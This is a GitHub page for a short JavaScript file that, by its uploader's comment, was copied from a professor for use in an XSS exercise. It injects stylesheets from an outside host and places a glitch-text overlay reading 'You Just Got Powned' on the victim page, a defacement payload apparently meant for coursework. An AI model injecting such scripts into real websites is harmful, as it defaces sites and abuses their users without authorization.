-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathlby.js
More file actions
48 lines (45 loc) · 1.48 KB
/
lby.js
File metadata and controls
48 lines (45 loc) · 1.48 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// This file is from my professor: Mr. Sprague
// I just copied and pasted it for an XSS vulnerability
//Inject CSS and font into the HEAD portion
/*
<HEAD>
<link rel="stylesheet" href="https://realmadsci.github.io/j/glitch.css">
<link href="https://fonts.googleapis.com/css2?family=Syne+Mono&display=swap" rel="stylesheet">
</HEAD>
*/
function addStyle(url) {
let styles = "@import url('" + escape(url) + "');";
let newSS=document.createElement('link');
newSS.rel='stylesheet';
newSS.href='data:text/css,' + styles;
document.getElementsByTagName("head")[0].appendChild(newSS);
}
addStyle('https://j.rms.rip/glitch.css');
addStyle('https://fonts.googleapis.com/css2?family=Syne+Mono&display=swap');
// Inject body overlay and text
/*
<div class="realmadoverlay">
<div class="realmadglitch" data-text="realmadsci">realmadsci</div>
<div class="realmadglitch" data-text="was">was</div>
<div class="realmadglitch" data-text="here">here</div>
</div>
<BODY>
*/
function makeDivWithClass(cls) {
let d = document.createElement('div');
d.classList.add(cls);
return d;
}
function makeGlitchWord(word) {
let d = makeDivWithClass('realmadglitch');
d.setAttribute('data-text', word);
let t = document.createTextNode(word);
d.appendChild(t);
return d;
}
let overlay = makeDivWithClass('realmadoverlay');
let w = ['You', 'Just', 'Got', 'Powned'];
w.forEach(function(word) {
overlay.appendChild(makeGlitchWord(word));
});
document.body.appendChild(overlay);